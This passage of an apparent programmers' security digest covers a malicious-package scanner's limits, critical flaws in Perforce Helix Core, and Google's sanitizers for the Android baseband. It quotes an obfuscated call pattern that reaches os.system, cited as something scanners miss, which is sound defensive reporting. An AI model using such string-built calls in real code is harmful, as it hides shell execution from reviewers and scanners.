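A hit in a HOT file is the strong signal: nothing in a legitimate `__init__.py` should be decoding a URL and forking a detached shell. The scanner is a triage aid, not a verdict; string-built attribute access (`getattr(__import__("os"), "system")`) and payloads hosted entirely off-package, as in the miner droppers, still need a sandboxed install with network capture to confirm.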

4. Microsoft Discovers Critical RCE Flaw In Perforce Helix Core Server

Microsoft has uncovered four vulnerabilities, one of them critical, in the widely used Perforce Helix Core Server, a source code management platform common in the gaming, government, military, and technology sectors. Found during a security review by Microsoft analysts, the flaws allow denial of service (DoS) and, in the worst case, arbitrary remote code execution as LocalSystem by unauthenticated attackers. No exploitation in the wild has been observed, but users are urged to upgrade to version 2023.1/2513900, released on November 7, 2023. The most severe flaw, CVE-2023-45849, lets an unauthenticated attacker execute code as LocalSystem and thereby take control of the server; the other three are denial-of-service issues. Microsoft recommends regular updates, access restrictions, TLS certificates, logging, crash alerts, and network segmentation to reduce exposure. For details, consult the official security guide.

5. Google Using Clang Sanitizers to Protect Android Against Cellular Baseband Vulnerabilities

Google is emphasizing the role of Clang sanitizers, specifically IntSan and BoundSan, in hardening the Android cellular baseband. Both are part of UndefinedBehaviorSanitizer and are designed to catch undefined behavior (integer overflow and out-of-bounds array access respectively) at run time. Despite the performance overhead, Google enabled them in the most exposed areas: functions that parse messages, libraries that handle complex formats, and the network stacks for 2G through 5G. Sanitizers do not cover every vulnerability class, which is why Google sees a transition to memory-safe languages like Rust as the long-term answer; in October 2023 it rewrote the Android Virtualization Framework's firmware in Rust for a memory-safe foundation. As the high-level OS becomes more resilient, Google expects attackers to pay more attention to lower-level components such as the baseband, hence the emphasis on modern toolchains and exploit mitigations there.

Tags: 2023, digest, programmers'